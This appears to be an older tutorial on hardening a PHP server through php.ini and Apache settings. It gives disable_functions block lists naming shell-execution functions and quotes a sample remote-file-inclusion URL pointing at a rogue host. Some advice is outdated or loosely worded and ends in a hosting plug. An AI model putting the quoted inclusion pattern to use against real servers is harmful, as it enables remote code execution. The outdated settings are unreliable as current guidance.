In this tutorial I'll show you how you can secure your php configuration via php.ini
I highly recommend you enable safe_mode on production servers, especially in shared environments. This will stop exec functions and others that can easily prevent a security breach.
Disable Dangerous PHP Functions
PHP has a lot of potential to mess up your server and hack user accounts and even get root. I've seen many times where users use an insecure PHP script as an entry point to a server to start unleashing dangerous commands and taking control.
Search the php.ini file for:
disable_functions =
Add the following:
disable_functions = dl,system,exec,passthru,shell_exec
disable_functions = dl,system,exec,passthru,shell_exec,proc_open,proc_close
disable_functions = dl,system,exec,passthru,shell_exec,proc_open,proc_get_status,proc_terminate,proc_close,dir,readfile,virtual,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
Turn off Register Globals
Register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn't require variable initialization means writing insecure code is that much easier.See http://us2.php.net/register_globals
register_globals = On
Replace it with:
register_globals = Off
Run PHP through PHPsuexec Preventing Nobody Access
The biggest problem with PHP is that on cPanel servers is that PHP will run as nobody. When someone sets a script to 777 access that means the nobody user has write access to that file. So if someone on the same shared server wrote a script to search the system for 777 files they could inject anything they wanted, compromising the unsuspecting users account.
PHPsuexec makes PHP run as the user so 777 permissions are not allowed. There are a few downfalls to PHPsuexec but I think it's required on a shared environment for the security of everyone. Safe_mode doesn't prevent you from compromising other users files. This is where PHPsuexec comes in, it stops the user from being able to read another users files. It also makes it easier for you, the administrator, to track PHP mail function spamming and lots of other issues caused by PHP scripts because now you can easily track it ot the users account responsible.
For this you will need to recompile PHP with suexec. On cPanel /scripts/easyapach has this build in.
I hope this has summed up some of the things you can do to help secure PHP on your server. There's also open_base protection which you can use to prevent users from reading other users files.
In addition to that you can hide the version of the server you're using, and avoid advertising the version of any modules loaded in your servers response.
If you alter your httpd.conf file to include the following two lines the presence, and version, of the PHP module will be hidden - as will the version of Apache you're using:
ServerSignature Off
ServerTokens production
Disallow Dangerous Functions
Like perl, or C, PHP has a "system" function which allows scripts to execute commands.
If you're happy you don't need this ability in the scripts you're using then you can disable this function, in case it's abused by a remote attacker.
To disable functions you merely add their name to the disable_functions option. For example:
disable_functions = dl, phpinfo, system, mail ...
Limit Resources
To avoid your PHP installation from consuming too many resources you can place limits on their usage.
The following settings are all useful ways of adjusting the resources your PHP scripts can consume:
; Maximum execution time of each script, in seconds
max_execution_time = 30
; Maximum amount of time each script may spend parsing request data
max_input_time = 60
; Maximum amount of memory a script may consume (8MB)
memory_limit = 8M
; Maximum size of POST data that PHP will accept.
post_max_size = 8M
; Whether to allow HTTP file uploads.
file_uploads = Off
; Maximum allowed size for uploaded files.
upload_max_filesize = 2M
Avoid Opening Remote Files
One of the useful abilities of PHP is the ability to open files remotely without any complex processing.
Many simple scripts use this ability, for example a comic viewer might open up images from a remote server just using the fopen function - which is ordinarily used to open files.
It is an ability has often been abused in insecure scripts though.
If you have a script which tries to open a file and the filename is controllable by a remote user two things can happen:
Any file on the local system which the webserver can read can be viewed by the remote attacker.
Arbitary commands can be executed upon your server if the user can cause a remote PHP file to be opened.
To disable this attack you can set the following in your php.ini file:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
;
; This is turned off to avoid variable redefinition by remote attacker
; that attempts to have the server download (and execute) a remote file
; from a compromised host. This behaviour has been observed in automatic
; scanning against badly written applications:
; http://myhost/myapplication.php?include=http://roguesever/rogueapp.php
allow_url_fopen = Off
More examples of tightening up PHP security can be found on the PHP website.
display_errors = Off
log_errors = On
error_log = syslog
ignore_repeated_errors = On
Note:
We use Hosting and VPS Hosting, from: www.star-host.org
We like and trust them.
Good prices, high security.
